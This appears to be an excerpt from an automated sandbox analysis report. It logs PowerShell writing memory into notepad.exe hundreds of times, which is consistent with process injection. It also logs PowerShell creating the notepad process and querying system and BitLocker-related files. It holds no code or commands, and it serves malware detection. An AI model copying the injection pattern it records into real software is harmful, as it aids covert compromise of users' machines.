              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D112FC0093Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D112FC0094Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D112FC0095Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D112FC0096Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D112FC0097Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D112FC0098Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D112FC0099Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D112FC009AJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D112FC009BJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D112FC009CJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D112FC009DJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D112FC009EJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D112FC009FJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D112FC00A0Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D112FC00A1Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D112FC00A2Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D112FC00A3Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D112FC00A4Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D112FC00A5Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D112FC00A6Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D112FC00A7Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D112FC00A8Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D112FC00A9Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D112FC00AAJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D112FC00ABJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D112FC00ACJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D112FC00ADJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D112FC00AEJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D112FC00AFJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D112FC00B0Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D112FC00B1Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D112FC00B2Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D112FC00B3Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D112FC00B4Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D112FC00B5Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D112FC00B6Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D112FC00B7Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D112FC00B8Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D112FC00B9Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D112FC00BAJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D112FC00BBJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D112FC00BCJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D112FC00BDJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D112FC00BEJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D112FC00BFJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D112FC00C0Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D112FC00C1Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D112FC00C2Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D112FC00C3Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D112FC00C4Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D112FC00C5Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D112FC00C6Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D112FC00C7Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D112FC00C8Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D112FC00C9Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D112FC00CAJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D112FC00CBJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D112FC00CCJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D112FC00CDJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D112FC00CEJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D112FC00CFJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D112FC00D0Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D112FC00D1Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D112FC00D2Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D112FC00D3Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D112FC00D4Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D112FC00D5Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D112FC00D6Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D112FC00D7Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D112FC00D8Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D112FC00D9Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D112FC00DAJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D112FC00DBJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D112FC00DCJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D112FC00DDJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D112FC00DEJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D112FC00DFJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D112FC00E0Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D112FC00E1Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D112FC00E2Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D112FC00E3Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D112FC00E4Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D112FC00E5Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D112FC00E6Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D112FC00E7Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D112FC00E8Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D112FC00E9Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D112FC00EAJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Memory written: C:\Windows\System32\notepad.exe (225 events at consecutive base addresses, 1D112FC00EB through 1D112FC01CB; one event per row below)
base: 1D112FC00EB
base: 1D112FC00EC
base: 1D112FC00ED
base: 1D112FC00EE
base: 1D112FC00EF
base: 1D112FC00F0
base: 1D112FC00F1
base: 1D112FC00F2
base: 1D112FC00F3
base: 1D112FC00F4
base: 1D112FC00F5
base: 1D112FC00F6
base: 1D112FC00F7
base: 1D112FC00F8
base: 1D112FC00F9
base: 1D112FC00FA
base: 1D112FC00FB
base: 1D112FC00FC
base: 1D112FC00FD
base: 1D112FC00FE
base: 1D112FC00FF
base: 1D112FC0100
base: 1D112FC0101
base: 1D112FC0102
base: 1D112FC0103
base: 1D112FC0104
base: 1D112FC0105
base: 1D112FC0106
base: 1D112FC0107
base: 1D112FC0108
base: 1D112FC0109
base: 1D112FC010A
base: 1D112FC010B
base: 1D112FC010C
base: 1D112FC010D
base: 1D112FC010E
base: 1D112FC010F
base: 1D112FC0110
base: 1D112FC0111
base: 1D112FC0112
base: 1D112FC0113
base: 1D112FC0114
base: 1D112FC0115
base: 1D112FC0116
base: 1D112FC0117
base: 1D112FC0118
base: 1D112FC0119
base: 1D112FC011A
base: 1D112FC011B
base: 1D112FC011C
base: 1D112FC011D
base: 1D112FC011E
base: 1D112FC011F
base: 1D112FC0120
base: 1D112FC0121
base: 1D112FC0122
base: 1D112FC0123
base: 1D112FC0124
base: 1D112FC0125
base: 1D112FC0126
base: 1D112FC0127
base: 1D112FC0128
base: 1D112FC0129
base: 1D112FC012A
base: 1D112FC012B
base: 1D112FC012C
base: 1D112FC012D
base: 1D112FC012E
base: 1D112FC012F
base: 1D112FC0130
base: 1D112FC0131
base: 1D112FC0132
base: 1D112FC0133
base: 1D112FC0134
base: 1D112FC0135
base: 1D112FC0136
base: 1D112FC0137
base: 1D112FC0138
base: 1D112FC0139
base: 1D112FC013A
base: 1D112FC013B
base: 1D112FC013C
base: 1D112FC013D
base: 1D112FC013E
base: 1D112FC013F
base: 1D112FC0140
base: 1D112FC0141
base: 1D112FC0142
base: 1D112FC0143
base: 1D112FC0144
base: 1D112FC0145
base: 1D112FC0146
base: 1D112FC0147
base: 1D112FC0148
base: 1D112FC0149
base: 1D112FC014A
base: 1D112FC014B
base: 1D112FC014C
base: 1D112FC014D
base: 1D112FC014E
base: 1D112FC014F
base: 1D112FC0150
base: 1D112FC0151
base: 1D112FC0152
base: 1D112FC0153
base: 1D112FC0154
base: 1D112FC0155
base: 1D112FC0156
base: 1D112FC0157
base: 1D112FC0158
base: 1D112FC0159
base: 1D112FC015A
base: 1D112FC015B
base: 1D112FC015C
base: 1D112FC015D
base: 1D112FC015E
base: 1D112FC015F
base: 1D112FC0160
base: 1D112FC0161
base: 1D112FC0162
base: 1D112FC0163
base: 1D112FC0164
base: 1D112FC0165
base: 1D112FC0166
base: 1D112FC0167
base: 1D112FC0168
base: 1D112FC0169
base: 1D112FC016A
base: 1D112FC016B
base: 1D112FC016C
base: 1D112FC016D
base: 1D112FC016E
base: 1D112FC016F
base: 1D112FC0170
base: 1D112FC0171
base: 1D112FC0172
base: 1D112FC0173
base: 1D112FC0174
base: 1D112FC0175
base: 1D112FC0176
base: 1D112FC0177
base: 1D112FC0178
base: 1D112FC0179
base: 1D112FC017A
base: 1D112FC017B
base: 1D112FC017C
base: 1D112FC017D
base: 1D112FC017E
base: 1D112FC017F
base: 1D112FC0180
base: 1D112FC0181
base: 1D112FC0182
base: 1D112FC0183
base: 1D112FC0184
base: 1D112FC0185
base: 1D112FC0186
base: 1D112FC0187
base: 1D112FC0188
base: 1D112FC0189
base: 1D112FC018A
base: 1D112FC018B
base: 1D112FC018C
base: 1D112FC018D
base: 1D112FC018E
base: 1D112FC018F
base: 1D112FC0190
base: 1D112FC0191
base: 1D112FC0192
base: 1D112FC0193
base: 1D112FC0194
base: 1D112FC0195
base: 1D112FC0196
base: 1D112FC0197
base: 1D112FC0198
base: 1D112FC0199
base: 1D112FC019A
base: 1D112FC019B
base: 1D112FC019C
base: 1D112FC019D
base: 1D112FC019E
base: 1D112FC019F
base: 1D112FC01A0
base: 1D112FC01A1
base: 1D112FC01A2
base: 1D112FC01A3
base: 1D112FC01A4
base: 1D112FC01A5
base: 1D112FC01A6
base: 1D112FC01A7
base: 1D112FC01A8
base: 1D112FC01A9
base: 1D112FC01AA
base: 1D112FC01AB
base: 1D112FC01AC
base: 1D112FC01AD
base: 1D112FC01AE
base: 1D112FC01AF
base: 1D112FC01B0
base: 1D112FC01B1
base: 1D112FC01B2
base: 1D112FC01B3
base: 1D112FC01B4
base: 1D112FC01B5
base: 1D112FC01B6
base: 1D112FC01B7
base: 1D112FC01B8
base: 1D112FC01B9
base: 1D112FC01BA
base: 1D112FC01BB
base: 1D112FC01BC
base: 1D112FC01BD
base: 1D112FC01BE
base: 1D112FC01BF
base: 1D112FC01C0
base: 1D112FC01C1
base: 1D112FC01C2
base: 1D112FC01C3
base: 1D112FC01C4
base: 1D112FC01C5
base: 1D112FC01C6
base: 1D112FC01C7
base: 1D112FC01C8
base: 1D112FC01C9
base: 1D112FC01CA
base: 1D112FC01CB
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D112FC01CCJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D112FC01CDJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D112FC01CEJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D112FC01CFJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D112FC01D0Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D112FC01D1Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D112FC01D2Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D112FC01D3Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D112FC01D4Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D112FC01D5Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D112FC01D6Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D112FC01D7Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D112FC01D8Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D112FC01D9Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D112FC01DAJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D112FC01DBJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D112FC01DCJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D112FC01DDJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D112FC01DEJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D112FC01DFJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D112FC01E0Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D112FC01E1Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D112FC01E2Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D112FC01E3Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D112FC01E4Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D112FC01E5Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D112FC01E6Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D112FC01E7Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D112FC01E8Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D112FC01E9Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D112FC01EAJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D112FC01EBJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D112FC01ECJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D112FC01EDJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D112FC01EEJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D112FC01EFJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D112FC01F0Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D112FC01F1Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D112FC01F2Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D112FC01F3Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\notepad.exe C:\Windows\System32\notepad.exe
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
